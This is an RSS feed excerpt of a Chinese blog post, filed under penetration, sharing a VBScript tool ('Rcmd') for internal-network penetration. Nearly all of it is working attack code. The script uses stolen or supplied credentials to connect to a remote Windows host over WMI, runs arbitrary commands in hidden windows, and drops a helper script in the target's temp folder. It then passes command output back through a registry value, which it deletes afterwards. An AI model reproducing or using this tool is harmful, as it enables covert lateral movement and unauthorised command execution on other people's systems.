大智若鲁's Blog » 渗透 http://www.lzpnb.com ----我留在网上的一点痕迹. Tue, 27 Dec 2011 12:38:43 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 用于内网渗透的VBS脚本 http://www.lzpnb.com/archives/233 http://www.lzpnb.com/archives/233#comments Tue, 30 Jun 2009 07:09:32 +0000 大智若鲁 http://www.lzpnb.com/?p=233 内网渗透VBS,支持回显
作者:NP
On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))=”Wscript.exe”) Then
Set objShell=Wscript.CreateObject(“Wscript.shell”)
objShell.Run(“cmd.exe /k cscript //nologo “&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If
If Wscript.arguments.Count<4 Then
usage()
Wscript.echo "Not enough Parameters."
Wscript.Quit
End If

ip=Wscript.arguments(0)
username=Wscript.arguments(1)
password=Wscript.arguments(2)
CmdStr=Wscript.arguments(3)
EchoStr=Wscript.arguments(4)
foldername="c:\\windows\\temp\\"

wsh.echo "Conneting "&ip&" ...."
Set objlocator=CreateObject("wbemscripting.swbemlocator")
Set objswbemservices=objlocator.connectserver(ip,"root/cimv2",username,password)
showerror(err.number)
Set Win_Process=objswbemservices.Get("Win32_ProcessStartup")
Set Hide_Windows=Win_Process.SpawnInstance_
Hide_Windows.ShowWindow=12
Set Rcmd=objswbemservices.Get("Win32_Process")
Set colFiles = objswbemservices.ExecQuery _
("Select * from CIM_Datafile Where Name = '"&foldername&"read.vbs'")
If colFiles.Count = 0 Then
wsh.echo "Not found read.vbs! Create Now!"
Create_read()
End If

If EchoStr = "0" Then
msg=Rcmd.create("cmd /c "&CmdStr,Null,Hide_Windows,intProcessID)
Else
msg=Rcmd.create("cmd /c cscript %windir%\temp\read.vbs """&CmdStr&"""",Null,Hide_Windows,intProcessID)
End If

If msg = 0 Then
wsh.echo "Command success..."
Else
showerror(Err.Number)
End If

wsh.echo "Please Wait 3 Second ...."
wsh.sleep(3000)
Set StdOut = Wscript.StdOut
Set oReg=objlocator.connectserver(ip,"root/default",username,password).Get("stdregprov")
oReg.GetMultiStringValue &H80000002,"SOFTWARE\Clients","cmd" ,arrValues
wsh.echo String(79,"*")
wsh.echo cmdstr&Chr(13)&Chr(10)
'wsh.echo arrvalues
For Each strValue In arrValues
StdOut.WriteLine strValue
Next
oReg.DeleteValue &H80000002,"SOFTWARE\Clients","cmd"

Sub Create_read()
RunYN =Rcmd.create("cmd /c echo set ws=WScript.CreateObject(^""WScript.Shell^"")> %windir%\temp\read.vbs”_
&”&&echo str=ws.Exec(^”"cmd /c ^”"^&wscript.arguments(0)).StdOut.ReadAll:set ws=nothing>> %windir%\temp\read.vbs”_
&”&&echo Set oReg=GetObject(^”"winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv^”")>> %windir%\temp\read.vbs”_
&”&&echo oReg.SetMultiStringValue ^&H80000002,^”"SOFTWARE\Clients^”",^”"cmd^”",Array(str) >> %windir%\temp\read.vbs”,Null,Hide_Windows,intProcessID)
If RunYN = 0 Then
wsh.echo “read.vbs Created!!!”
Else
showerror(Err.Number)
End If

End Sub

Function showerroronly(errornumber)
If errornumber Then
wsh.echo “Error 0x”&CStr(Hex(Err.Number))&” .”
If Err.Description <> “” Then
wsh.echo “Error Description: “&Err.Description&”.”
End If
Wscript.Quit
Else
outstreem.Write “.”
End If
End Function

Sub usage()
wsh.echo string(79,”*”)
wsh.echo “Rcmd v1.01 by NetPatch”
wsh.echo “Usage:”
wsh.echo “cscript “&wscript.scriptfullname&” targetIP username password Command”
wsh.echo “cscript “&wscript.scriptfullname&” targetIP username password Command 0 //No echo”
wsh.echo string(79,”*”)&vbcrlf
end Sub

]]> http://www.lzpnb.com/archives/233/feed 0